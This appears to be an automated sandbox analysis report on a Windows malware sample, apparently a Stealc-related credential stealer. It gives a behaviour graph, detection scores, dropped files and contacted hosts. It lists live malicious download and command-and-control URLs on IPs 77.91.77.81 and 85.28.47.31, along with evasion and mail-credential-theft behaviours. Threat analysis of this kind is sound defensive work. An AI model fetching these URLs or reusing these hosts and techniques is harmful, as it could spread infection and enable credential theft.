                          Masquerading                          		DCSync13
                          Process Discovery                          		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                          Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job351
                          Virtualization/Sandbox Evasion                          		Proc Filesystem1
                          Application Window Discovery                          		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                          Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt212
                          Process Injection                          		/etc/passwd and /etc/shadow1
                          System Owner/User Discovery                          		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                          Behavior Graph

                          Hide Legend

                          Legend:

                          • Process
                          • Signature
                          • Created File
                          • DNS/IP Info
                          • Is Dropped
                          • Is Windows Process
                          • Number of created Registry Values
                          • Number of created Files
                          • Visual Basic
                          • Delphi
                          • Java
                          • .Net C# or VB.NET
                          • C, C++ or other language
                          • Is malicious
                          • Internet
                          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1479814 Sample: file.exe Startdate: 24/07/2024 Architecture: WINDOWS Score: 100 108 www.youtube.com 2->108 110 support.mozilla.org 2->110 112 25 other IPs or domains 2->112 144 Multi AV Scanner detection for domain / URL 2->144 146 Found malware configuration 2->146 148 Malicious sample detected (through community Yara rule) 2->148 150 16 other signatures 2->150 11 file.exe 41 2->11         started        16 explorti.exe 2->16         started        18 axplong.exe 2->18         started        20 3 other processes 2->20 signatures3 process4 dnsIp5 130 85.28.47.31, 49711, 49727, 80 GES-ASRU Russian Federation 11->130 132 77.91.77.81, 49718, 49820, 49821 FOTONTELECOM-TRANSIT-ASFOTONTELECOMISPRU Russian Federation 11->132 92 C:\Users\user\AppData\RoamingCBGCBGCAFI.exe, PE32 11->92 dropped 94 C:\Users\user\AppData\...\softokn3[1].dll, PE32 11->94 dropped 96 C:\Users\user\AppData\Local\...\random[1].exe, PE32 11->96 dropped 100 15 other files (11 malicious) 11->100 dropped 168 Detected unpacking (changes PE section rights) 11->168 170 Detected unpacking (overwrites its own PE header) 11->170 172 Tries to steal Mail credentials (via file / registry access) 11->172 182 7 other signatures 11->182 22 cmd.exe 1 11->22         started        24 cmd.exe 11->24         started        26 cmd.exe 1 11->26         started        28 WerFault.exe 11->28         started        134 77.91.77.82, 49819, 80 FOTONTELECOM-TRANSIT-ASFOTONTELECOMISPRU Russian Federation 16->134 136 prod.balrog.prod.cloudops.mozgcp.net 16->136 98 C:\Users\user\AppData\Local\...\num[1].exe, PE32 16->98 dropped 174 Hides threads from debuggers 16->174 176 Tries to detect sandboxes / dynamic malware analysis system (registry check) 16->176 178 Tries to detect process monitoring tools (Task Manager, Process Explorer etc.) 16->178 31 4ddf12fb51.exe 16->31         started        34 explorti.exe 16->34         started        180 Maps a DLL or memory area into another process 20->180 36 firefox.exe 20->36         started        39 msedge.exe 20->39         started        41 6 other processes 20->41 file6 signatures7 process8 dnsIp9 43 userGDHIIIIEHC.exe 4 22->43         started        47 conhost.exe 22->47         started        49 RoamingCBGCBGCAFI.exe 24->49         started        51 conhost.exe 24->51         started        53 userCFHCBKKFIJ.exe 8 26->53         started        55 conhost.exe 26->55         started        102 C:\ProgramData\Microsoft\...\Report.wer, Unicode 28->102 dropped 184 Detected unpacking (changes PE section rights) 31->184 186 Detected unpacking (overwrites its own PE header) 31->186 57 WerFault.exe 31->57         started        114 services.addons.mozilla.org 18.66.102.82 MIT-GATEWAYSUS United States 36->114 116 prod.detectportal.prod.cloudops.mozgcp.net 34.107.221.82, 49757, 49758, 80 GOOGLEUS United States 36->116 122 6 other IPs or domains 36->122 104 C:\Users\user\AppData\...\gmpopenh264.dll.tmp, PE32+ 36->104 dropped 106 C:\Users\user\...\gmpopenh264.dll (copy), PE32+ 36->106 dropped 59 firefox.exe 36->59         started        61 firefox.exe 36->61         started        118 www.youtube.com 39->118 120 bzib.nelreports.net 39->120 124 17 other IPs or domains 39->124 file10 signatures11 process12 file13 88 C:\Users\user\AppData\Local\...\explorti.exe, PE32 43->88 dropped 152 Antivirus detection for dropped file 43->152 154 Detected unpacking (changes PE section rights) 43->154 156 Machine Learning detection for dropped file 43->156 166 3 other signatures 43->166 63 explorti.exe 43->63         started        90 C:\Users\user\AppData\Local\...\axplong.exe, PE32 49->90 dropped 158 Multi AV Scanner detection for dropped file 49->158 160 Tries to evade debugger and weak emulator (self modifying code) 49->160 162 Tries to detect virtualization through RDTSC time measurements 49->162 66 axplong.exe 49->66         started        164 Detected unpacking (overwrites its own PE header) 53->164 68 cmd.exe 1 53->68         started        signatures14 process15 signatures16 188 Detected unpacking (changes PE section rights) 63->188 190 Tries to detect sandboxes and other dynamic analysis tools (window names) 63->190 192 Tries to evade debugger and weak emulator (self modifying code) 63->192 194 Tries to detect process monitoring tools (Task Manager, Process Explorer etc.) 63->194 196 Multi AV Scanner detection for dropped file 66->196 198 Hides threads from debuggers 66->198 200 Tries to detect sandboxes / dynamic malware analysis system (registry check) 66->200 70 chrome.exe 1 68->70         started        73 msedge.exe 10 68->73         started        75 conhost.exe 68->75         started        77 firefox.exe 1 68->77         started        process17 dnsIp18 126 192.168.2.6, 443, 49705, 49710 unknown unknown 70->126 128 239.255.255.250 unknown Reserved 70->128 79 chrome.exe 70->79         started        82 chrome.exe 70->82         started        84 chrome.exe 70->84         started        86 msedge.exe 73->86         started        process19 dnsIp20 138 www.youtube.com 79->138 140 detectportal.firefox.com 79->140 142 6 other IPs or domains 79->142

                          Screenshots

                          Thumbnails

                          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                          windows-stand

                          Antivirus, Machine Learning and Genetic Malware Detection

                          Initial Sample

                          SourceDetectionScannerLabelLink
                          file.exe38%VirustotalBrowse
                          file.exe37%ReversingLabs
                          file.exe100%Joe Sandbox ML

                          Dropped Files

                          SourceDetectionScannerLabelLink
                          C:\Users\userGDHIIIIEHC.exe100%AviraTR/Crypt.TPM.Gen
                          C:\Users\userGDHIIIIEHC.exe100%Joe Sandbox ML
                          C:\Users\userCFHCBKKFIJ.exe100%Joe Sandbox ML
                          C:\ProgramData\freebl3.dll0%ReversingLabs
                          C:\ProgramData\mozglue.dll0%ReversingLabs
                          C:\ProgramData\msvcp140.dll0%ReversingLabs
                          C:\ProgramData\nss3.dll0%ReversingLabs
                          C:\ProgramData\softokn3.dll0%ReversingLabs
                          C:\ProgramData\vcruntime140.dll0%ReversingLabs
                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\freebl3[1].dll0%ReversingLabs
                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\mozglue[1].dll0%ReversingLabs
                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\msvcp140[1].dll0%ReversingLabs
                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\nss3[1].dll0%ReversingLabs
                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\num[1].exe92%ReversingLabsWin32.Trojan.Stealc
                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\random[1].exe37%ReversingLabs
                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\softokn3[1].dll0%ReversingLabs
                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\vcruntime140[1].dll0%ReversingLabs
                          C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe58%ReversingLabsWin32.Trojan.Generic
                          C:\Users\user\AppData\RoamingCBGCBGCAFI.exe58%ReversingLabsWin32.Trojan.Generic
                          C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\gmp-gmpopenh264\1.8.1.2\gmpopenh264.dll (copy)0%ReversingLabs
                          C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\gmp-gmpopenh264\1.8.1.2\gmpopenh264.dll.tmp0%ReversingLabs

                          Unpacked PE Files

                          No Antivirus matches

                          Domains

                          SourceDetectionScannerLabelLink
                          example.org0%VirustotalBrowse
                          chrome.cloudflare-dns.com0%VirustotalBrowse
                          prod.balrog.prod.cloudops.mozgcp.net0%VirustotalBrowse
                          prod.classify-client.prod.webservices.mozgcp.net0%VirustotalBrowse
                          prod.detectportal.prod.cloudops.mozgcp.net0%VirustotalBrowse
                          services.addons.mozilla.org0%VirustotalBrowse
                          ssl.bingadsedgeextension-prod-europe.azurewebsites.net0%VirustotalBrowse
                          contile.services.mozilla.com0%VirustotalBrowse
                          fg.microsoft.map.fastly.net0%VirustotalBrowse
                          www3.l.google.com0%VirustotalBrowse
                          prod.ads.prod.webservices.mozgcp.net0%VirustotalBrowse
                          prod.content-signature-chains.prod.webservices.mozgcp.net0%VirustotalBrowse
                          ipv4only.arpa0%VirustotalBrowse
                          prod.remote-settings.prod.webservices.mozgcp.net0%VirustotalBrowse
                          us-west1.prod.sumo.prod.webservices.mozgcp.net0%VirustotalBrowse
                          www.google.com0%VirustotalBrowse
                          telemetry-incoming.r53-2.services.mozilla.com0%VirustotalBrowse
                          youtube-ui.l.google.com0%VirustotalBrowse
                          push.services.mozilla.com0%VirustotalBrowse
                          firefox.settings.services.mozilla.com0%VirustotalBrowse
                          support.mozilla.org0%VirustotalBrowse
                          play.google.com0%VirustotalBrowse
                          www.youtube.com0%VirustotalBrowse
                          content-signature-2.cdn.mozilla.net0%VirustotalBrowse
                          detectportal.firefox.com0%VirustotalBrowse
                          accounts.youtube.com0%VirustotalBrowse
                          shavar.services.mozilla.com0%VirustotalBrowse
                          spocs.getpocket.com0%VirustotalBrowse
                          bzib.nelreports.net0%VirustotalBrowse

                          URLs

                          SourceDetectionScannerLabelLink
                          https://getpocket.cdn.mozilla.net/v3/firefox/trending-topics?version=2&consumer_key=$apiKey&locale_l0%URL Reputationsafe
                          http://detectportal.firefox.com/0%URL Reputationsafe
                          http://developer.mozilla.org/en/docs/DOM:element.removeEventListener0%URL Reputationsafe
                          http://www.mozilla.com00%URL Reputationsafe
                          https://monitor.firefox.com0%URL Reputationsafe
                          https://smartblock.firefox.etp/play.svg0%URL Reputationsafe
                          https://firefox.settings.services.mozilla.com0%URL Reputationsafe
                          http://www.fontbureau.com/designers0%URL Reputationsafe
                          https://truecolors.firefox.com0%URL Reputationsafe
                          http://77.91.77.82/Hun4Ko/index.php100%URL Reputationphishing
                          https://screenshots.firefox.com0%URL Reputationsafe
                          https://www.youtube.com0%URL Reputationsafe
                          https://completion.amazon.com/search/complete?q=0%URL Reputationsafe
                          https://ads.stickyadstv.com/firefox-etp0%URL Reputationsafe
                          https://xhr.spec.whatwg.org/#sync-warning0%URL Reputationsafe
                          https://e.mail.ru/cgi-bin/sentmsg?mailto=%s0%URL Reputationsafe
                          https://www.amazon.com/exec/obidos/external-search/0%URL Reputationsafe
                          https://www.msn.com0%URL Reputationsafe
                          https://firefox-api-proxy.cdn.mozilla.net/0%URL Reputationsafe
                          http://www.urwpp.deDPlease0%URL Reputationsafe
                          https://www.reddit.com/0%URL Reputationsafe
                          http://www.zhongyicts.com.cn0%URL Reputationsafe
                          https://youtube.com/0%URL Reputationsafe
                          http://www.mozilla.com/en-US/blocklist/0%URL Reputationsafe
                          https://fpn.firefox.com0%URL Reputationsafe
                          http://crl.rootca1.amazontrust.com/rootca1.crl00%URL Reputationsafe
                          https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br0%URL Reputationsafe
                          https://www.youtube.com/0%URL Reputationsafe
                          https://www.youtube.com/account0%URL Reputationsafe
                          http://www.carterandcone.coml0%URL Reputationsafe
                          https://getpocket.cdn.mozilla.net/v3/firefox/global-recs?version=3&consumer_key=$apiKey&locale_lang=0%URL Reputationsafe
                          https://amazon.com0%URL Reputationsafe
                          https://static.adsafeprotected.com/firefox-etp-pixel0%URL Reputationsafe
                          http://detectportal.firefox.com/canonical.html0%URL Reputationsafe
                          https://smartblock.firefox.etp/facebook.svg0%URL Reputationsafe
                          https://developer.mozilla.org/docs/Web/API/Element/releasePointerCapture0%URL Reputationsafe
                          https://spocs.getpocket.com/0%URL Reputationsafe
                          http://77.91.77.81/soka/random.exe100%Avira URL Cloudphishing
                          http://77.91.77.81/mine/amadka.exe100%URL Reputationphishing
                          http://77.91.77.81/cost/go.exe100%URL Reputationmalware
                          http://85.28.47.31/8405906461a5200c/msvcp140.dll100%Avira URL Cloudmalware
                          https://extensionworkshop.com/documentation/publish/self-distribution/0%URL Reputationsafe
                          https://getpocket.cdn.mozilla.net/v3/newtab/layout?version=1&consumer_key=$apiKey&layout_variant=bas0%URL Reputationsafe
                          https://mail.yahoo.co.jp/compose/?To=%st0%Avira URL Cloudsafe
                          https://mail.google.com/mail/?extsrc=mailto&url=%s0%URL Reputationsafe
                          https://youtube.comZ0%Avira URL Cloudsafe
                          http://85.28.47.31/8405906461a5200c/vcruntime140.dll100%Avira URL Cloudmalware
                          http://85.28.47.31/5499d72b3a3e55be.phplegram100%Avira URL Cloudmalware
                          https://www.msn.comZ0%Avira URL Cloudsafe
                          https://mail.yahoo.co.jp/compose/?To=%st0%VirustotalBrowse
                          http://85.28.47.31_0%Avira URL Cloudsafe
                          http://85.28.47.31/8405906461a5200c/vcruntime140.dll17%VirustotalBrowse
                          http://77.91.77.81/soka/random.exe26%VirustotalBrowse
                          http://85.28.47.31/5499d72b3a3e55be.php4100%Avira URL Cloudmalware
                          http://85.28.47.31/5499d72b3a3e55be.php/100%Avira URL Cloudmalware
                          http://77.91.77.81/soka/random.exeFP100%Avira URL Cloudphishing
                          http://77.91.77.81/Kiru9gu/index.php100%Avira URL Cloudphishing
                          http://85.28.47.31100%Avira URL Cloudmalware
                          http://85.28.47.31/8405906461a5200c/msvcp140.dll17%VirustotalBrowse
                          http://poczta.interia.pl/mh/?mailto=%sw0%Avira URL Cloudsafe
                          http://77.91.77.81/Kiru9gu/index.php23%VirustotalBrowse
                          http://85.28.47.3120%VirustotalBrowse
                          http://85.28.47.31/5499d72b3a3e55be.php/19%VirustotalBrowse
                          http://85.28.47.31/5499d72b3a3e55be.php.exe100%Avira URL Cloudmalware
                          http://85.28.47.31/5499d72b3a3e55be.php$100%Avira URL Cloudmalware
                          http://85.28.47.31/5499d72b3a3e55be.php419%VirustotalBrowse
                          http://85.28.47.31L0%Avira URL Cloudsafe
                          https://www.youtube.com/accountUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=e0%Avira URL Cloudsafe
                          https://support.mozilla.org/kb/fix-video-audio-problems-firefox-windows0%Avira URL Cloudsafe
                          http://85.28.47.31/5499d72b3a3e55be.php$16%VirustotalBrowse
                          http://poczta.interia.pl/mh/?mailto=%sw0%VirustotalBrowse
                          http://77.91.77.81/cost/go.exe00Start4http://77.91.77.81/soka/random.exe00Start2CURRENTRENTs---JKEBF100%Avira URL Cloudphishing
                          http://85.28.47.31v0%Avira URL Cloudsafe
                          https://profiler.firefox.com/0%Avira URL Cloudsafe
                          http://85.28.47.31silence/5499d72b3a3e55be.php0%Avira URL Cloudsafe
                          https://support.mozilla.org/kb/fix-video-audio-problems-firefox-windows0%VirustotalBrowse
                          https://firefox-source-docs.mozilla.org/performance/scroll-linked_effects.html0%Avira URL Cloudsafe
                          https://clients2.googleusercontent.com/crx/blobs/AVsOOGgL4EVsLTMzZa-C0yXaDVW5z6pCjWzx7YKwHb9PR6v117H2hbsZgQ2S3VrQetSMoK86b9iY-_-8nYIxIJD4BasJl9SD8IoqvPIbEK9wBlfqTusC6rL6yTYDfaVSn9sAxlKa5bRpPaxsFjcmEK7Nec5bVL7NZYhc/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_80_1_0.crx0%Avira URL Cloudsafe
                          http://85.28.47.31/8405906461a5200c/sqlite3.dllj100%Avira URL Cloudmalware
                          https://profiler.firefox.com/0%VirustotalBrowse
                          https://github.com/mozilla-services/screenshots0%Avira URL Cloudsafe
                          https://firefox-source-docs.mozilla.org/performance/scroll-linked_effects.html0%VirustotalBrowse
                          https://developer.mozilla.org/docs/Mozilla/Add-ons/WebExtensions/API/tabs/captureTab0%Avira URL Cloudsafe
                          http://85.28.47.31/5499d72b3a3e55be.phpv100%Avira URL Cloudmalware
                          https://developer.mozilla.org/en-US/docs/Glossary/speculative_parsing0%Avira URL Cloudsafe
                          https://clients2.googleusercontent.com/crx/blobs/AVsOOGgL4EVsLTMzZa-C0yXaDVW5z6pCjWzx7YKwHb9PR6v117H2hbsZgQ2S3VrQetSMoK86b9iY-_-8nYIxIJD4BasJl9SD8IoqvPIbEK9wBlfqTusC6rL6yTYDfaVSn9sAxlKa5bRpPaxsFjcmEK7Nec5bVL7NZYhc/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_80_1_0.crx0%VirustotalBrowse
                          http://85.28.47.31/8405906461a5200c/softokn3.dll100%Avira URL Cloudmalware
                          https://developer.mozilla.org/docs/Mozilla/Add-ons/WebExtensions/API/tabs/captureTab0%VirustotalBrowse
                          http://85.28.47.31/5499d72b3a3e55be.phpv18%VirustotalBrowse
                          https://github.com/mozilla-services/screenshots0%VirustotalBrowse
                          http://85.28.47.31/8405906461a5200c/sqlite3.dllj16%VirustotalBrowse
                          http://85.28.47.31/5499d72b3a3e55be.phpx100%Avira URL Cloudmalware
                          https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi0%Avira URL Cloudsafe
                          http://85.28.47.31/8405906461a5200c/nss3.dll100%Avira URL Cloudmalware
                          http://exslt.org/dates-and-times0%Avira URL Cloudsafe
                          http://ocsp.rootca1.amazontrust.com0:0%Avira URL Cloudsafe
                          https://developer.mozilla.org/en-US/docs/Glossary/speculative_parsing0%VirustotalBrowse
                          http://85.28.47.31/5499d72b3a3e55be.phph100%Avira URL Cloudmalware
                          http://85.28.47.31/5499d72b3a3e55be.phpc100%Avira URL Cloudmalware
                          http://85.28.47.31/5499d72b3a3e55be.phpx16%VirustotalBrowse

                          Domains and IPs

                          Contacted Domains

                          NameIPActiveMaliciousAntivirus DetectionReputation
                          example.org
                          		93.184.215.14
                          		truefalseunknown
                          chrome.cloudflare-dns.com
                          		172.64.41.3
                          		truefalseunknown
                          prod.classify-client.prod.webservices.mozgcp.net
                          		35.190.72.216
                          		truefalseunknown
                          prod.balrog.prod.cloudops.mozgcp.net
                          		35.244.181.201
                          		truefalseunknown
                          prod.detectportal.prod.cloudops.mozgcp.net
                          		34.107.221.82
                          		truefalseunknown
                          services.addons.mozilla.org
                          		18.66.102.82
                          		truefalseunknown
                          ssl.bingadsedgeextension-prod-europe.azurewebsites.net
                          		94.245.104.56
                          		truefalseunknown
                          prod.remote-settings.prod.webservices.mozgcp.net
                          		34.149.100.209
                          		truefalseunknown
                          contile.services.mozilla.com
                          		34.117.188.166
                          		truefalseunknown
                          prod.content-signature-chains.prod.webservices.mozgcp.net
                          		34.160.144.191
                          		truefalseunknown
                          fg.microsoft.map.fastly.net
                          		199.232.214.172
                          		truefalseunknown
                          youtube-ui.l.google.com
                          		142.250.186.110
                          		truefalseunknown
                          www3.l.google.com
                          		172.217.18.14
                          		truefalseunknown
                          play.google.com
                          		142.250.186.142
                          		truefalseunknown
                          us-west1.prod.sumo.prod.webservices.mozgcp.net
                          		34.149.128.2
                          		truefalseunknown
                          ipv4only.arpa
                          		192.0.0.170
                          		truefalseunknown
                          prod.ads.prod.webservices.mozgcp.net
                          		34.117.188.166
                          		truefalseunknown
                          www.google.com
                          		142.250.184.228
                          		truefalseunknown
                          telemetry-incoming.r53-2.services.mozilla.com
                          		34.120.208.123
                          		truefalseunknown
                          spocs.getpocket.com
                          		unknown
                          		unknowntrueunknown
                          content-signature-2.cdn.mozilla.net
                          		unknown
                          		unknowntrueunknown
                          support.mozilla.org
                          		unknown
                          		unknowntrueunknown
                          firefox.settings.services.mozilla.com
                          		unknown
                          		unknowntrueunknown
                          push.services.mozilla.com
                          		unknown
                          		unknowntrueunknown
                          www.youtube.com
                          		unknown
                          		unknowntrueunknown
                          detectportal.firefox.com
                          		unknown
                          		unknowntrueunknown
                          bzib.nelreports.net
                          		unknown
                          		unknowntrueunknown
                          accounts.youtube.com
                          		unknown
                          		unknowntrueunknown
                          shavar.services.mozilla.com
                          		unknown
                          		unknowntrueunknown

                          Contacted URLs

                          NameMaliciousAntivirus DetectionReputation
                          http://77.91.77.81/soka/random.exetrue
                          • 26%, Virustotal, Browse
                          • Avira URL Cloud: phishing
                          		unknown
                          http://85.28.47.31/8405906461a5200c/vcruntime140.dlltrue
                          • 17%, Virustotal, Browse
                          • Avira URL Cloud: malware
                          		unknown
                          http://85.28.47.31/8405906461a5200c/msvcp140.dlltrue
                          • 17%, Virustotal, Browse
                          • Avira URL Cloud: malware
                          		unknown
                          http://77.91.77.81/Kiru9gu/index.phpfalse
                          • 23%, Virustotal, Browse
                          • Avira URL Cloud: phishing
                          		unknown
                          http://77.91.77.82/Hun4Ko/index.phptrue
                          • URL Reputation: phishing
                          		unknown
                          http://85.28.47.31silence/5499d72b3a3e55be.phptrue
                          • Avira URL Cloud: safe
                          		unknown
                          https://clients2.googleusercontent.com/crx/blobs/AVsOOGgL4EVsLTMzZa-C0yXaDVW5z6pCjWzx7YKwHb9PR6v117H2hbsZgQ2S3VrQetSMoK86b9iY-_-8nYIxIJD4BasJl9SD8IoqvPIbEK9wBlfqTusC6rL6yTYDfaVSn9sAxlKa5bRpPaxsFjcmEK7Nec5bVL7NZYhc/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_80_1_0.crxfalse
                          • 0%, Virustotal, Browse
                          • Avira URL Cloud: safe
                          		unknown
                          http://85.28.47.31/8405906461a5200c/softokn3.dlltrue
                          • 17%, Virustotal, Browse
                          • Avira URL Cloud: malware
                          		unknown
                          http://85.28.47.31/8405906461a5200c/nss3.dlltrue
                          • 10%, Virustotal, Browse
                          • Avira URL Cloud: malware
                          		unknown
                          http://85.28.47.31/8405906461a5200c/mozglue.dlltrue
                          • 17%, Virustotal, Browse
                          • Avira URL Cloud: malware
                          		unknown
                          https://www.youtube.com/accountfalse
                          • URL Reputation: safe
                          		unknown
                          https://www.google.com/favicon.icofalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://bzib.nelreports.net/api/report?cat=bingbusinessfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://85.28.47.31/8405906461a5200c/freebl3.dlltrue
                          • Avira URL Cloud: malware
                          		unknown
                          http://detectportal.firefox.com/canonical.htmlfalse
                          • URL Reputation: safe
                          		unknown
                          http://85.28.47.31/true
                          • Avira URL Cloud: malware
                          		unknown
                          http://77.91.77.81/mine/amadka.exetrue
                          • URL Reputation: phishing
                          		unknown
                          http://77.91.77.81/cost/go.exetrue
                          • URL Reputation: malware
                          		unknown

                          URLs from Memory and Binaries

                          NameSourceMaliciousAntivirus DetectionReputation
                          https://mail.yahoo.co.jp/compose/?To=%stfirefox.exe, 00000012.00000003.3086335305.000001E959B86000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000012.00000003.2738887810.000001E959B86000.00000004.00000800.00020000.00000000.sdmpfalse
                          • 0%, Virustotal, Browse
                          • Avira URL Cloud: safe
                          		unknown
                          https://youtube.comZfirefox.exe, 00000012.00000003.2736212002.00000BE3CEB03000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://85.28.47.31/5499d72b3a3e55be.phplegramfile.exe, 00000000.00000002.2564756762.0000000026D03000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: malware
                          		unknown
                          https://getpocket.cdn.mozilla.net/v3/firefox/trending-topics?version=2&consumer_key=$apiKey&locale_lfirefox.exe, 00000012.00000003.2739459008.000001E95777B000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://detectportal.firefox.com/firefox.exe, 00000012.00000003.3070555649.000001E95CC1E000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://www.msn.comZfirefox.exe, 00000012.00000003.2736212002.00000BE3CEB03000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://85.28.47.31_4ddf12fb51.exe, 0000002F.00000002.2934283237.0000000000752000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://85.28.47.31/5499d72b3a3e55be.php44ddf12fb51.exe, 0000002F.00000002.2934283237.000000000078D000.00000004.00000020.00020000.00000000.sdmpfalse
                          • 19%, Virustotal, Browse
                          • Avira URL Cloud: malware
                          		unknown
                          http://developer.mozilla.org/en/docs/DOM:element.removeEventListenerfirefox.exe, 00000012.00000003.2875877920.000001E95D258000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000012.00000003.2869503726.000001E95DC88000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000012.00000003.2569023742.000001E95DC88000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://85.28.47.31/5499d72b3a3e55be.php/4ddf12fb51.exe, 00000032.00000002.3040813931.0000000000A5F000.00000004.00000020.00020000.00000000.sdmpfalse
                          • 19%, Virustotal, Browse
                          • Avira URL Cloud: malware
                          		unknown
                          http://www.mozilla.com0firefox.exe, 00000012.00000003.2898080233.000001E95BB00000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://77.91.77.81/soka/random.exeFPfile.exe, 00000000.00000002.2564756762.0000000026D03000.00000004.00000020.00020000.00000000.sdmptrue
                          • Avira URL Cloud: phishing
                          		unknown
                          https://monitor.firefox.comfirefox.exe, 00000012.00000003.2740267659.000001E957740000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000012.00000003.3085961974.000001E959BAD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000012.00000003.2800500299.000001E959BBD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000012.00000003.2738403683.000001E959BBE000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://85.28.47.31file.exe, 00000000.00000002.2520086702.000000000043C000.00000040.00000001.01000000.00000003.sdmp, 4ddf12fb51.exe, 0000002F.00000002.2934283237.000000000078D000.00000004.00000020.00020000.00000000.sdmp, 4ddf12fb51.exe, 0000002F.00000002.2934283237.0000000000752000.00000004.00000020.00020000.00000000.sdmp, 4ddf12fb51.exe, 00000032.00000002.3040813931.0000000000A05000.00000004.00000020.00020000.00000000.sdmptrue
                          • 20%, Virustotal, Browse
                          • Avira URL Cloud: malware
                          		unknown
                          http://poczta.interia.pl/mh/?mailto=%swfirefox.exe, 00000012.00000003.3086335305.000001E959B86000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000012.00000003.2738887810.000001E959B86000.00000004.00000800.00020000.00000000.sdmpfalse
                          • 0%, Virustotal, Browse
                          • Avira URL Cloud: safe
                          		unknown
                          https://smartblock.firefox.etp/play.svgfirefox.exe, 00000012.00000003.2607471320.000001E95ACDE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000012.00000003.3058630463.000001E95ACDE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000012.00000003.2692741855.000001E95ACDE000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://firefox.settings.services.mozilla.comfirefox.exe, 00000012.00000003.2803764583.000001E956991000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://www.fontbureau.com/designersfirefox.exe, 00000012.00000003.3181553847.000001E957B3A000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000012.00000003.3197786148.000001E95C39F000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://85.28.47.31/5499d72b3a3e55be.php.exefile.exe, 00000000.00000002.2520086702.000000000043C000.00000040.00000001.01000000.00000003.sdmpfalse
                          • Avira URL Cloud: malware
                          		unknown
                          https://truecolors.firefox.comfirefox.exe, 00000012.00000003.2740267659.000001E957740000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000012.00000003.2738403683.000001E959BD9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000012.00000003.2800500299.000001E959BD9000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://85.28.47.31/5499d72b3a3e55be.php$file.exe, 00000000.00000002.2525036759.0000000000850000.00000004.00000020.00020000.00000000.sdmpfalse
                          • 16%, Virustotal, Browse
                          • Avira URL Cloud: malware
                          		unknown
                          http://85.28.47.31Lfile.exe, 00000000.00000002.2525036759.0000000000812000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
